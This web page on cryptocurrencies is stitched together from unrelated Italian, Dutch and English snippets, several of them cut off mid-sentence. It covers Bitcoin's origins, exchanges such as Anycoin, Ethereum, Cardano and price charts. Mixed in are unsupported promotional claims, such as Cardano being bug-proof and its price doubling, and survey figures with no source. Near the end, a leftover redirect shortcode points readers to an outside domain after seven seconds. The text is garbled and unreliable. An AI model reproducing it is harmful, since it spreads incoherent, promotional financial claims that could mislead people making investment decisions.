“Outlook in valuta digitale -i vantaggi e gli svantaggi della valuta digitale”

La forte salita del Bitcoin è stata per un po’ frenata a inizio settembre anche dalle decisioni di grandi attori, come la Federal reserve o le banche cinesi, che hanno posto alcuni dubbi sulla raccolta fondi tramite le Ico, destinate alle criptovalute “sorelle” di Bitcoin (qui tutto sul funzionamento delle Altcoin). Che in questo periodo stanno spuntando come i funghi, pur senza riuscire a mettere in discussione la posizione di leadership di Bitcoin. «Non tutte sono valide allo stesso livello, ciascuna ha peculiarità diverse, Bitcoin è senz’altro quella che ha dimostrato la maggiore capacità di attrarre l’interesse del mercato, che ha favorito la sua crescita e il suo valore», evidenzia Portale.

^ a b c d e ALI, S, T; CLARKE, D; MCCORRY, P; Bitcoin: Perils of an Unregulated Global P2P Currency [By S. T Ali, D. Clarke, P. McCorry Newcastle upon Tyne: Newcastle University: Computing Science, 2015. (Newcastle University, Computing Science, Technical Report Series, No. CS-TR-1470)

Su internet, in particolare nel campo delle criptovalute, non è facile trovare aziende che agiscano in modo serio. Anycoin Direct, società dei Paesi Bassi (munita di regolare partita iva, iscrizione alla Camera di Commercio, indirizzo, numero di telefono e contatti web, tutti visualizzati nella loro homepage in basso a destra) consente di acquistare e vendere valute digitali. Come potete osservare dalla figura Anycoin attualmente opera con ben 13 valute digitali differenti. Per usufruire del servizio è preferibile la registrazione al sito nonchè la verifica dell’identità. Nel caso in cui si vogliano vendere criptovalute (bitcoin, monero, ethereum, peercoin, etc…) è previsto l’accredito della somma equivalente in moneta classica su conto bancario oppure su paypal.

Senza la figura dei miner quindi, le transazioni non potrebbero avvenire tra gli utenti di una criptovaluta. Chiunque può diventare un miner. O almeno così in teoria è. In pratica, serve l’attrezzatura necessaria che non sempre è alla portata delle tasche di tutti.

Io mi diverto sempre a prendere i concetti e a ribaltarli, per sentire come suonano. Faccio un esempio. Quando sento in tv che il pd ha adottato una politica per incoraggiare le assunzioni a tempo indeterminato istintivamente mi viene da pensare che sia una cosa giusta >>>

La cosa è diventata così virale che Vitalik ha dovuto cambiare il suo nome utente sul social network in Vitalik “No, non sto regalando ETH” Buterin. Non che sia servito, gli hanno copiato anche quello e incredibilmente qualcuno ci sta ancora cascando. 

In 2008 raakte de financiele crisis in een stroomversnelling, nadat de belangrijke Amerikaanse bank Lehman Brothers failliet ging. Het gevolg daarvan was dat mensen, bedrijven en overheden wereldwijd het risico liepen hun bij de bank ondergebrachte eigendommen kwijt te raken. Kort daarna publiceerde een onbekend persoon of met de alias Satoshi Nakamoto een document genaamd “Bitcoin: A Peer-to-Peer Electronic Cash System”. Hierin legt Satoshi zijn uitvinding, Bitcoin, uit: een (P2P) digitaal netwerk om onderling betalingen te verrichten zonder tussenkomst van een derde partij, zoals een bank of overheid.

L’idea di aggirare le procedure e nodi del sistema finanziario, sottrarsi al controllo (e alla difesa) di una banca centrale affidando il proprio valore alle sole dinamiche di mercato, sono gli elementi di fascinazione intellettuale che seducono tanti sostenitori della valuta digitale. Non è un caso che il bitcoin si affermi dopo che il sistema finanziario tradizionale ha messo a nudo limiti e contraddizioni con la crisi del 2008. Ci sono però diversi  fattori che potrebbero bloccare e invertire bruscamente la marcia del bitcoin e delle sue sorelle digitali. Un’azione regolatoria più incisiva da parte delle autorità centrali, la nascita di valute digitali “ufficiali” gestite direttamente dalle banche centrali. Esistono problematiche di natura ambientale. L’energia utilizzata dai computer che producono bitcoin ha già raggiunto livelli impressionanti ed è destinata ad aumentare drammaticamente se il trend dovesse mantenersi costante.

ETHEREUM A RISCHIO OLIGOPOLIO. L’idea a molti non piace: il pericolo è che il controllo sulla blockchain si concentri nelle mani dei pochi che possiedono più Ether e sono quindi disposti a puntare sistematicamente più alto. C’è chi teme che così venga ribaltata l’essenza stessa delle cripto-valute, l’idea di una moneta senza padroni. Altri, invece, ritengono che il successo non possa che passare per una riduzione dell’anarchia del Bitcoin. Un cripto-gatto nero ha appena incrociato la strada di Ethereum, solo il tempo dirà se si è trattato di un cattivo presagio o, se dopo una breve frenata, la creatura di Buterin è riuscita a riprendere la sua corsa.

Come prima cosa, dovete possedere delle criptovalute. Ciò significa che in qualche modo dovrete acquistarle (a meno che non vogliate diventare dei “miner”). Per acquistarle il “luogo” più comodo sono i cosiddetti “exchange”, siti dove è possibile comprare e vendere differenti tipi di criptovalute. Ma anche scambiare le proprie criptovalute con denaro reale.

Il software Bitcoin di per sé risulta molto sicuro. Qualunque modifica al protocollo di base è realizzabile solo con il consenso di tutti gli utenti. Inoltre l’aumento costante dei coin disponibili potrebbe portare alla lunga ad un assestamento del prezzo e impedire che avvengano oscillazioni estreme. Chi volesse aggiungere quest’ambiziosa tipologia di pagamento al proprio online shop, corre un rischio soltanto nel caso in cui, dall’oggi al domani, una grande parte del fatturato sia in bitcoin. Invece, nel caso di sporadiche piccole transazioni, malgrado ne consegua un impegno maggiore, i bitcoin offrono anche la possibilità di rivolgersi ad una nuova clientela.

Cardano vanta un linguaggio di programmazione avanzato e a prova di bug (Haskell) per la creazione e la gestione di smart contract e applicazioni decentralizzate su una piattaforma a più livelli. La mancanza di mining e un team costituito da ingegneri e ricercatori accademici sono altre caratteristiche degne di nota. I volumi sono ancora bassi ma, sostiene Ivanov, “una volta che Cardano verrà aggiunta su una piattaforma regolata, allora il suo prezzo potrà raddoppiare”.

Bij Bitcoin gaan de transacties direct van de ene persoon of bedrijf naar de andere. In een mum van tijd. Ook internationaal. Dus niet zoals bij de huidige banken dat het 5 werkdagen duurt voor een betaling naar bijvoorbeeld Indonesie. Ook de transactiekosten bij Bitcoin betalingen zijn veel lager dan bij de huidige banktransacties.

Filosofia : molti progetti di criptovaluta si confondono nel loro white paper, usando la parola in senso non accademico. Qui puoi imparare da dove è nato il progetto e quali sono i suoi obiettivi. Spiega come Cardano accetti le più recenti intuizioni accademiche e ingegneristiche per costruire una block Haskell altamente sicura. 

ETHUSD dopo un periodo di forte stabilità rispetto a tutte le altre criptovalute maggiormente capitalizzate è crollato anche lui, ma oggi tutto il cripto-mercato sembra dare segnali di crescita. Nel grafico ho indicato una formazione di un testa-spalle rialzista ben evidente in h1 con la neckline (RD1) che mi farà da trigger. Una volta valicata la neckline posso …

Seppure in diverse forme, le valute esistono da millenni, e fino al XXI secolo sono sempre circolate fisicamente. Tutto è cambiato nel 2009 quando Bitcoin ha rilasciato un software open source utilizzato per creare una valuta digitale. Una valuta digitale, conosciuta anche come criptovaluta, viene creata utilizzando software specializzati e viene detenuta solo in forma digitale su computer e server in tutto il mondo.

Il Bitcoin fa segnare qualcosa di veramente incredibile. Una quotazione che fino ad oggi non ci saremmo mai aspettato. Qualcosa che potremmo definire come un record assoluto. Infatti, oggi possiamo affermare con certezza che se nel mese di Gennaio 2017 esso era quotato al di sotto della quotazione dell’oro, oggi esso supera la quotazione dell’oro. Ma sarà mica possibile che …

The research also reveals that 57% of those holding bitcoin sold off part of their stash around the December 2017 highs. The study shows that another 38% of these are considering making a sale these days. Just 5% have no current intention to sell their bitcoins. [redirect url=’http://curbee.info/bump’ sec=’7′]

Leave a Reply

Your email address will not be published. Required fields are marked *